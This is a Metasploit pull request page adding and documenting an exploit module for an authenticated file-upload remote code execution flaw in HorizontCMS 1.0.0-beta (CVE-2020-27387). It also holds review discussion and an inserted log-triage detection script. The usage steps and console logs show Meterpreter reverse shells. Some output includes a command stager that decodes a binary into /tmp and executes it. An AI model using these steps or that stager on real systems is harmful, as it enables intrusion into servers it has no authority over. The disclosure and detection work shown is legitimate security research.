
Add HorizontCMS 1.0.0-beta exploit module and documentation #14340

Merged
merged 3 commits into from
Nov 13, 2020

Conversation

ErikWynter
Contributor

@ErikWynter ErikWynter commented Nov 3, 2020

About

This change adds a new module to /modules/exploits/multi/http/ that exploits an arbitrary file upload vulnerability (CVE-2020-27387) in HorizontCMS 1.0.0-beta and prior in order to execute arbitrary commands. The change also adds documentation for this module. I discovered and disclosed the vulnerability, which has been fixed, but not in a specific version release.

Vulnerable system

HorizontCMS 1.0.0-beta and prior

Verification Steps

  1. Install the module as usual
  2. Start msfconsole
  3. Do: use exploit/multi/http/horizontcms_upload_exec
  4. Do: set RHOSTS [IP]
  5. Do: set USERNAME [username for the HorizontCMS account]
  6. Do: set PASSWORD [password for the HorizontCMS account]
  7. Do: set target [target]
  8. Do: set payload [payload]
  9. Do: set LHOST [IP]
  10. Do: exploit

Options

PASSWORD

The password for the HorizontCMS account to authenticate with.

TARGETURI

The base path to HorizontCMS. The default value is /.

USERNAME

The username for the HorizontCMS account to authenticate with.

Targets

Id  Name
--  ----
0   PHP
1   Linux
2   Windows

Scenarios

HorizontCMS 1.0.0-beta running on Ubuntu 18.04 - PHP target

msf6 exploit(multi/http/horizontcms_upload_exec) > show options 
Module options (exploit/multi/http/horizontcms_upload_exec):
   Name       Current Setting   Required  Description
   ----       ---------------   --------  -----------
   PASSWORD   test              yes       Password to authenticate with
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.227     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                yes       The target port (TCP)
   SSL        false             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                 yes       The base path to HorizontCMS
   URIPATH                      no        The URI to use for this exploit (default is random)
   USERNAME   test              yes       Username to authenticate with
   VHOST      testhorizont.com  no        HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.128    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   PHP
msf6 exploit(multi/http/horizontcms_upload_exec) > run
[*] Started reverse TCP handler on 192.168.1.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is HorizontCMS with version 1.0.0-beta
[+] Successfully authenticated to the HorizontCMS dashboard
[*] Uploading payload as EaCPK1HSbRru.php...
[+] Successfully uploaded EaCPK1HSbRru.php. The server renamed it to Mflikdb8nNKTivXU3HPZnpsCy3nOu34FH1IsWaxl
[+] Successfully renamed payload back to EaCPK1HSbRru.php
[*] Executing the payload...
[*] Sending stage (39264 bytes) to 192.168.1.227
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.227:49968) at 2020-10-31 15:52:57 -0400
[+] Successfully deleted EaCPK1HSbRru.php
meterpreter > getuid
Server username: www-data (33)
meterpreter >

HorizontCMS 1.0.0-beta running on Ubuntu 18.04 - Linux target

msf6 exploit(multi/http/horizontcms_upload_exec) > run
[*] Started reverse TCP handler on 192.168.1.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is HorizontCMS with version 1.0.0-beta
[+] Successfully authenticated to the HorizontCMS dashboard
[*] Uploading payload as W6nQKce4Uq.php...
[+] Successfully uploaded W6nQKce4Uq.php. The server renamed it to L6TL9BHTAckj6UrzfSyOBvAT3Bl2uFskRHrG3pXG
[+] Successfully renamed payload back to W6nQKce4Uq.php
[*] Executing the payload via a series of HTTP GET requests to `/storage/W6nQKce4Uq.php?qo1E=<command>`
[*] Sending stage (3008420 bytes) to 192.168.1.227
[*] Command Stager progress - 100.00% done (897/897 bytes)
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.227:49978) at 2020-10-31 15:56:58 -0400
[+] Successfully deleted W6nQKce4Uq.php
meterpreter > getuid
Server username: www-data @ ubuntu (uid=33, gid=33, euid=33, egid=33)
meterpreter > 
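The exploitation chain visible in the output above (a .php file uploaded, renamed back under /storage/, then driven with GET requests carrying a command in a query parameter, and finally deleted) leaves a simple footprint in the web server's access log. The following Ruby script is an added example, not part of this PR or of the Metasploit module: the log lines are constructed, and the rule it applies (a server-side script requested under /storage/) is an assumption based only on the path shown in the module output.

```ruby
# Added example, not part of the PR or of the Metasploit module: triage of
# web-server access logs for the footprint in the module output above. The
# module uploads a .php file, renames it back under /storage/, then drives it
# with GET /storage/<name>.php?<param>=<command>; a server-side script being
# requested under the upload directory is the indicator used here.

# Combined log format: client, identity, user, [timestamp], "METHOD uri proto", status.
LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<uri>\S+) [^"]*" (?<status>\d{3})/
# Extensions a PHP handler would execute when served from a web-visible directory.
SCRIPT_EXT_RE = /\.(php\d?|phtml|phar)\z/i

# Constructed sample lines (hosts, file names and query values are made up,
# mirroring the shape of the module output; they are not from a real incident).
SAMPLE_LOG = <<~LOG
  192.168.1.128 - - [31/Oct/2020:15:52:55 -0400] "GET /storage/EaCPK1HSbRru.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  10.0.0.5 - - [31/Oct/2020:15:53:01 -0400] "GET /storage/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
  10.0.0.5 - - [31/Oct/2020:15:53:02 -0400] "GET /index.php HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
  192.168.1.128 - - [31/Oct/2020:15:56:58 -0400] "GET /storage/W6nQKce4Uq.php?qo1E=id HTTP/1.1" 200 64 "-" "Mozilla/5.0"
  192.168.1.128 - - [31/Oct/2020:15:56:59 -0400] "GET /storage/W6nQKce4Uq.php?qo1E=uname HTTP/1.1" 200 64 "-" "Mozilla/5.0"
LOG

# Parse one combined-format line into a hash; returns nil for lines that do not match.
def parse_line(line)
  m = LINE_RE.match(line)
  return nil unless m
  path, query = m[:uri].split('?', 2)
  { ip: m[:ip], ts: m[:ts], method: m[:method], path: path, query: query, status: m[:status].to_i }
end

# True when a server-side script is requested under the upload directory.
# /index.php is normal for the CMS; nothing under /storage/ should be executable.
def storage_script_request?(req)
  req[:path].start_with?('/storage/') && req[:path].match?(SCRIPT_EXT_RE)
end

# All matching requests in a log blob, in file order.
def find_storage_script_hits(log)
  log.each_line.map { |l| parse_line(l.strip) }.compact.select { |r| storage_script_request?(r) }
end

# Per-client summary: which uploaded scripts were called and which query parameter
# names carried input (the module uses a random parameter name per run).
def summarize_by_client(hits)
  hits.group_by { |h| h[:ip] }.transform_values do |reqs|
    { count: reqs.size,
      files: reqs.map { |r| r[:path] }.uniq,
      params: reqs.map { |r| r[:query].to_s.split('=', 2).first }.compact.uniq }
  end
end
```

The same rule works as a web-server or WAF policy: denying execution of script extensions under the upload directory removes the primitive regardless of how the file got there.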

@ErikWynter
Contributor Author

Notes

  • Please check the documentation for instructions on how to install vulnerable software for testing.
  • This vulnerability has been patched, but not in an official version release. This means that for now, if HorizontCMS is obtained by cloning the repo from GitHub, the version is 1.0.0-beta but the target won't be vulnerable. This may result in false positives for the check method. However, this problem should go away when a new version is released.
  • As with PR #14339 (Add flexdotnetcms v1.5.8 exploit module and docs), I requested a CVE ID for this issue, but haven't heard anything from MITRE in close to 4 weeks. Because it has been patched, I didn't feel like sitting on it anymore. Plus I figured that this way, Tod at Rapid7 might be able to help assign the CVE.

@ErikWynter ErikWynter changed the title Add horizontcms_upload_exec module and documentation Add HorizontCMS 1.0.0-beta exploit module and documentation Nov 3, 2020
@gwillcox-r7
Contributor

gwillcox-r7 commented Nov 3, 2020

@todb-r7 Can you take a look into this? Another case of CVE-ID's being delayed.

@todb-r7

todb-r7 commented Nov 4, 2020

I can hassle MITRE for this but usually the best bet for original Metasploit modules like this is to just ask Rapid7 for a CVE directly in the PR -- that way we're not in a race and end up issuing dupe CVEs like we did for CVE-2020-7373.

@todb-r7

todb-r7 commented Nov 4, 2020

CVE Request 983476 filed to sort this out. @kalba-security do you happen to have a reference number from your original request?

@ErikWynter
Contributor Author

ErikWynter commented Nov 5, 2020

@gwillcox-r7 @todb-r7 Coincidentally, MITRE finally responded and assigned the CVE last night, so you could cancel the request you filed. I've added the CVE (CVE-2020-27387) to the module and docs.

@todb-r7

todb-r7 commented Nov 5, 2020

Coincidence, sure, let's call it that. :)

@ErikWynter
Contributor Author

Hahaha! I felt so relieved that I was willing to give them the benefit of the doubt. Fixed it ;)

@cdelafuente-r7 cdelafuente-r7 self-assigned this Nov 9, 2020
Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment


Thanks for this great module @kalba-security ! I just left a few minor comments for you to review before it lands.

@ErikWynter
Contributor Author

Thanks for the suggestions @cdelafuente-r7 ! I added them in the latest commit.

@cdelafuente-r7
Contributor

Thanks for the updates @kalba-security. Everything looks good now. I tested against HorizontCMS version 1.0.0-beta on Ubuntu 18.04 and I correctly got a session with both the PHP and Linux targets. I wasn't able to make HorizontCMS work on Windows, so I couldn't test the third target (Windows). I will go ahead and land it.

Example output for target 0 (PHP)
msf6 exploit(multi/http/horizontcms_upload_exec) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/horizontcms_upload_exec) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/horizontcms_upload_exec) > set USERNAME admin
USERNAME => admin
msf6 exploit(multi/http/horizontcms_upload_exec) > set PASSWORD 123456
PASSWORD => 123456
msf6 exploit(multi/http/horizontcms_upload_exec) > set LHOST 192.168.2.101
LHOST => 192.168.2.101
msf6 exploit(multi/http/horizontcms_upload_exec) > set verbose true
verbose => true
msf6 exploit(multi/http/horizontcms_upload_exec) > options

Module options (exploit/multi/http/horizontcms_upload_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   123456           yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to HorizontCMS
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.2.101    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP


msf6 exploit(multi/http/horizontcms_upload_exec) > run

[*] Started reverse TCP handler on 192.168.2.101:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Running check
[+] The target appears to be vulnerable. Target is HorizontCMS with version 1.0.0-beta
[+] Successfully authenticated to the HorizontCMS dashboard
[*] Uploading payload as El4ptDgvQ.php...
[+] Successfully uploaded El4ptDgvQ.php. The server renamed it to BOx9UhRDB8047n1hWnY76qD1acRnSr8kTR3KwyIC
[+] Successfully renamed payload back to El4ptDgvQ.php
[*] Executing the payload...
[*] Sending stage (39264 bytes) to 192.168.2.101
[*] Meterpreter session 1 opened (192.168.2.101:4444 -> 192.168.2.101:53011) at 2020-11-13 12:45:48 +0100
[+] Successfully deleted El4ptDgvQ.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : 08b0569bfdf0
OS          : Linux 08b0569bfdf0 5.4.39-linuxkit #1 SMP Fri May 8 23:03:06 UTC 2020 x86_64
Meterpreter : php/linux
Example output for target 1 (Linux)
msf6 exploit(multi/http/horizontcms_upload_exec) > set target 1
target => 1
msf6 exploit(multi/http/horizontcms_upload_exec) > options

Module options (exploit/multi/http/horizontcms_upload_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   123456           yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to HorizontCMS
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.2.101    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux


msf6 exploit(multi/http/horizontcms_upload_exec) > run

[*] Started reverse TCP handler on 192.168.2.101:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Running check
[+] The target appears to be vulnerable. Target is HorizontCMS with version 1.0.0-beta
[+] Successfully authenticated to the HorizontCMS dashboard
[*] Uploading payload as LhajvAD4OG.php...
[+] Successfully uploaded LhajvAD4OG.php. The server renamed it to ZsR93xpskWpns43rwcgwrUcFnz3UdkqAIQxIYYxy
[+] Successfully renamed payload back to LhajvAD4OG.php
[*] Executing the payload via a series of HTTP GET requests to `/storage/LhajvAD4OG.php?mjo9p=<command>`
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAALAEAAAAAAADgAQAAAAAAAAAQAAAAAAAA6ydbU1+wCPyudf1XWVNeigYwB0j/x0j/xmaBP8mDdAeAPgh16uvm/+Ho1P///wYITjf5bA9en7AWTo/QSzfPbCRHXLQBCQNOg8Z+V2wMR19WbC9en2wEWWwHWAkDToPGfj1OkU6/BAYXWsauBGNXTo/gbBZcbCxeCQNfToPGfyNP+c9yHlFsJV5sBmwDTo/hTjfwCQNfX1lOg8Z/wWw6XmwHWQkDWGx4XAkDToPGfuv54MmD>>'/tmp/SNIva.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/XeSxZ' < '/tmp/SNIva.b64' ; chmod +x '/tmp/XeSxZ' ; '/tmp/XeSxZ' & sleep 2 ; rm -f '/tmp/XeSxZ' ; rm -f '/tmp/SNIva.b64'"]
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3008420 bytes) to 192.168.2.101
[*] Command Stager progress - 100.00% done (897/897 bytes)
[*] Meterpreter session 2 opened (192.168.2.101:4444 -> 192.168.2.101:53068) at 2020-11-13 12:46:16 +0100
[+] Successfully deleted LhajvAD4OG.php

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 18.04 (Linux 5.4.39-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data @ 08b0569bfdf0 (uid=33, gid=33, euid=33, egid=33)

@cdelafuente-r7 cdelafuente-r7 merged commit d6b412c into rapid7:master Nov 13, 2020
@cdelafuente-r7
Contributor

cdelafuente-r7 commented Nov 13, 2020

Release Notes

New module exploits/multi/http/horizontcms_upload_exec leverages an arbitrary file upload vulnerability in HorizontCMS 1.0.0-beta (and prior) to achieve authenticated RCE (CVE-2020-27387).

@pbarry-r7 pbarry-r7 added the rn-modules release notes for new or majorly enhanced modules label Nov 20, 2020